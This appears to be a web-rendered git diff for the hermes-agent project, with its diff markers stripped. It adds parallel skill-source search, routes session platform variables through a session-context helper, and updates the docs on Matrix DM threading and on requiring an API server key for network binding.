active: List[SkillSource] = []
|
||||
for src in sources:
|
||||
sid = src.source_id()
|
||||
if source_filter != "all" and sid != source_filter and sid != "official":
|
||||
continue
|
||||
active.append(src)
|
||||
|
||||
all_results: List[SkillMeta] = []
|
||||
source_counts: Dict[str, int] = {}
|
||||
timed_out_ids: List[str] = []
|
||||
|
||||
if not active:
|
||||
return all_results, source_counts, timed_out_ids
|
||||
|
||||
with ThreadPoolExecutor(max_workers=min(len(active), 8)) as pool:
|
||||
futures = {}
|
||||
for src in active:
|
||||
lim = per_source_limits.get(src.source_id(), 50)
|
||||
fut = pool.submit(_search_one_source, src, query, lim)
|
||||
futures[fut] = src.source_id()
|
||||
|
||||
try:
|
||||
for fut in as_completed(futures, timeout=overall_timeout):
|
||||
try:
|
||||
sid, results = fut.result(timeout=0)
|
||||
source_counts[sid] = len(results)
|
||||
all_results.extend(results)
|
||||
if on_source_done:
|
||||
on_source_done(sid, len(results))
|
||||
except Exception:
|
||||
pass
|
||||
except TimeoutError:
|
||||
timed_out_ids = [
|
||||
futures[f] for f in futures if not f.done()
|
||||
]
|
||||
if timed_out_ids:
|
||||
logger.debug(
|
||||
"Skills browse timed out waiting for: %s",
|
||||
", ".join(timed_out_ids),
|
||||
)
|
||||
|
||||
return all_results, source_counts, timed_out_ids
|
||||
|
||||
|
||||
def unified_search(query: str, sources: List[SkillSource],
|
||||
source_filter: str = "all", limit: int = 10) -> List[SkillMeta]:
|
||||
"""Search all sources and merge results."""
|
||||
all_results: List[SkillMeta] = []
|
||||
|
||||
for src in sources:
|
||||
if source_filter != "all" and src.source_id() != source_filter:
|
||||
continue
|
||||
try:
|
||||
results = src.search(query, limit=limit)
|
||||
all_results.extend(results)
|
||||
except Exception as e:
|
||||
logger.debug(f"Search failed for {src.source_id()}: {e}")
|
||||
"""Search all sources (in parallel) and merge results."""
|
||||
all_results, _, _ = parallel_search_sources(
|
||||
sources,
|
||||
query=query,
|
||||
source_filter=source_filter,
|
||||
overall_timeout=30,
|
||||
)
|
||||
|
||||
# Deduplicate by name, preferring higher trust levels
|
||||
_TRUST_RANK = {"builtin": 2, "trusted": 1, "community": 0}
|
||||
|
||||
@@ -347,7 +347,8 @@ def _capture_required_environment_variables(
|
||||
def _is_gateway_surface() -> bool:
|
||||
if os.getenv("HERMES_GATEWAY_SESSION"):
|
||||
return True
|
||||
return bool(os.getenv("HERMES_SESSION_PLATFORM"))
|
||||
from gateway.session_context import get_session_env
|
||||
return bool(get_session_env("HERMES_SESSION_PLATFORM"))
|
||||
|
||||
|
||||
def _get_terminal_backend_name() -> str:
|
||||
|
||||
@@ -1420,10 +1420,11 @@ def terminal_tool(
|
||||
# In gateway mode, auto-register a fast watcher so the
|
||||
# gateway can detect completion and trigger a new agent
|
||||
# turn. CLI mode uses the completion_queue directly.
|
||||
_gw_platform = os.getenv("HERMES_SESSION_PLATFORM", "")
|
||||
from gateway.session_context import get_session_env as _gse
|
||||
_gw_platform = _gse("HERMES_SESSION_PLATFORM", "")
|
||||
if _gw_platform and not check_interval:
|
||||
_gw_chat_id = os.getenv("HERMES_SESSION_CHAT_ID", "")
|
||||
_gw_thread_id = os.getenv("HERMES_SESSION_THREAD_ID", "")
|
||||
_gw_chat_id = _gse("HERMES_SESSION_CHAT_ID", "")
|
||||
_gw_thread_id = _gse("HERMES_SESSION_THREAD_ID", "")
|
||||
proc_session.watcher_platform = _gw_platform
|
||||
proc_session.watcher_chat_id = _gw_chat_id
|
||||
proc_session.watcher_thread_id = _gw_thread_id
|
||||
@@ -1445,9 +1446,10 @@ def terminal_tool(
|
||||
result_data["check_interval_note"] = (
|
||||
f"Requested {check_interval}s raised to minimum 30s"
|
||||
)
|
||||
watcher_platform = os.getenv("HERMES_SESSION_PLATFORM", "")
|
||||
watcher_chat_id = os.getenv("HERMES_SESSION_CHAT_ID", "")
|
||||
watcher_thread_id = os.getenv("HERMES_SESSION_THREAD_ID", "")
|
||||
from gateway.session_context import get_session_env as _gse2
|
||||
watcher_platform = _gse2("HERMES_SESSION_PLATFORM", "")
|
||||
watcher_chat_id = _gse2("HERMES_SESSION_CHAT_ID", "")
|
||||
watcher_thread_id = _gse2("HERMES_SESSION_THREAD_ID", "")
|
||||
|
||||
# Store on session for checkpoint persistence
|
||||
proc_session.watcher_platform = watcher_platform
|
||||
|
||||
+2
-1
@@ -480,7 +480,8 @@ def text_to_speech_tool(
|
||||
# Telegram voice bubbles require Opus (.ogg); OpenAI and ElevenLabs can
|
||||
# produce Opus natively (no ffmpeg needed). Edge TTS always outputs MP3
|
||||
# and needs ffmpeg for conversion.
|
||||
platform = os.getenv("HERMES_SESSION_PLATFORM", "").lower()
|
||||
from gateway.session_context import get_session_env
|
||||
platform = get_session_env("HERMES_SESSION_PLATFORM", "").lower()
|
||||
want_opus = (platform == "telegram")
|
||||
|
||||
# Determine output path
|
||||
|
||||
@@ -262,16 +262,17 @@ For cloud sandbox backends, persistence is filesystem-oriented. `TERMINAL_LIFETI
|
||||
| `MATRIX_REQUIRE_MENTION` | Require `@mention` in rooms (default: `true`). Set to `false` to respond to all messages. |
|
||||
| `MATRIX_FREE_RESPONSE_ROOMS` | Comma-separated room IDs where bot responds without `@mention` |
|
||||
| `MATRIX_AUTO_THREAD` | Auto-create threads for room messages (default: `true`) |
|
||||
| `MATRIX_DM_MENTION_THREADS` | Create a thread when bot is `@mentioned` in a DM (default: `false`) |
|
||||
| `HASS_TOKEN` | Home Assistant Long-Lived Access Token (enables HA platform + tools) |
|
||||
| `HASS_URL` | Home Assistant URL (default: `http://homeassistant.local:8123`) |
|
||||
| `WEBHOOK_ENABLED` | Enable the webhook platform adapter (`true`/`false`) |
|
||||
| `WEBHOOK_PORT` | HTTP server port for receiving webhooks (default: `8644`) |
|
||||
| `WEBHOOK_SECRET` | Global HMAC secret for webhook signature validation (used as fallback when routes don't specify their own) |
|
||||
| `API_SERVER_ENABLED` | Enable the OpenAI-compatible API server (`true`/`false`). Runs alongside other platforms. |
|
||||
| `API_SERVER_KEY` | Bearer token for API server authentication. Strongly recommended; required for any network-accessible deployment. |
|
||||
| `API_SERVER_KEY` | Bearer token for API server authentication. Enforced for non-loopback binding. |
|
||||
| `API_SERVER_CORS_ORIGINS` | Comma-separated browser origins allowed to call the API server directly (for example `http://localhost:3000,http://127.0.0.1:3000`). Default: disabled. |
|
||||
| `API_SERVER_PORT` | Port for the API server (default: `8642`) |
|
||||
| `API_SERVER_HOST` | Host/bind address for the API server (default: `127.0.0.1`). Use `0.0.0.0` for network access only with `API_SERVER_KEY` and a narrow `API_SERVER_CORS_ORIGINS` allowlist. |
|
||||
| `API_SERVER_HOST` | Host/bind address for the API server (default: `127.0.0.1`). Use `0.0.0.0` for network access — requires `API_SERVER_KEY` and a narrow `API_SERVER_CORS_ORIGINS` allowlist. |
|
||||
| `API_SERVER_MODEL_NAME` | Model name advertised on `/v1/models`. Defaults to the profile name (or `hermes-agent` for the default profile). Useful for multi-user setups where frontends like Open WebUI need distinct model names per connection. |
|
||||
| `MESSAGING_CWD` | Working directory for terminal commands in messaging mode (default: `~`) |
|
||||
| `GATEWAY_ALLOWED_USERS` | Comma-separated user IDs allowed across all platforms |
|
||||
|
||||
@@ -177,7 +177,7 @@ Authorization: Bearer ***
|
||||
Configure the key via `API_SERVER_KEY` env var. If you need a browser to call Hermes directly, also set `API_SERVER_CORS_ORIGINS` to an explicit allowlist.
|
||||
|
||||
:::warning Security
|
||||
The API server gives full access to hermes-agent's toolset, **including terminal commands**. If you change the bind address to `0.0.0.0` (network-accessible), **always set `API_SERVER_KEY`** and keep `API_SERVER_CORS_ORIGINS` narrow — without that, remote callers may be able to execute arbitrary commands on your machine.
|
||||
The API server gives full access to hermes-agent's toolset, **including terminal commands**. When binding to a non-loopback address like `0.0.0.0`, `API_SERVER_KEY` is **required**. Also keep `API_SERVER_CORS_ORIGINS` narrow to control browser access.
|
||||
|
||||
The default bind address (`127.0.0.1`) is for local-only use. Browser access is disabled by default; enable it only for explicit trusted origins.
|
||||
:::
|
||||
|
||||
@@ -16,7 +16,7 @@ Before setup, here's the part most people want to know: how Hermes behaves once
|
||||
|
||||
| Context | Behavior |
|
||||
|---------|----------|
|
||||
| **DMs** | Hermes responds to every message. No `@mention` needed. Each DM has its own session. |
|
||||
| **DMs** | Hermes responds to every message. No `@mention` needed. Each DM has its own session. Set `MATRIX_DM_MENTION_THREADS=true` to start a thread when the bot is `@mentioned` in a DM. |
|
||||
| **Rooms** | By default, Hermes requires an `@mention` to respond. Set `MATRIX_REQUIRE_MENTION=false` or add room IDs to `MATRIX_FREE_RESPONSE_ROOMS` for free-response rooms. Room invites are auto-accepted. |
|
||||
| **Threads** | Hermes supports Matrix threads (MSC3440). If you reply in a thread, Hermes keeps the thread context isolated from the main room timeline. Threads where the bot has already participated do not require a mention. |
|
||||
| **Auto-threading** | By default, Hermes auto-creates a thread for each message it responds to in a room. This keeps conversations isolated. Set `MATRIX_AUTO_THREAD=false` to disable. |
|
||||
@@ -62,6 +62,7 @@ matrix:
|
||||
free_response_rooms: # Rooms exempt from mention requirement
|
||||
- "!abc123:matrix.org"
|
||||
auto_thread: true # Auto-create threads for responses (default: true)
|
||||
dm_mention_threads: false # Create thread when @mentioned in DM (default: false)
|
||||
```
|
||||
|
||||
Or via environment variables:
|
||||
@@ -70,6 +71,7 @@ Or via environment variables:
|
||||
MATRIX_REQUIRE_MENTION=true
|
||||
MATRIX_FREE_RESPONSE_ROOMS=!abc123:matrix.org,!def456:matrix.org
|
||||
MATRIX_AUTO_THREAD=true
|
||||
MATRIX_DM_MENTION_THREADS=false
|
||||
```
|
||||
|
||||
:::note
|
||||
|
||||
Reference in New Issue
Block a user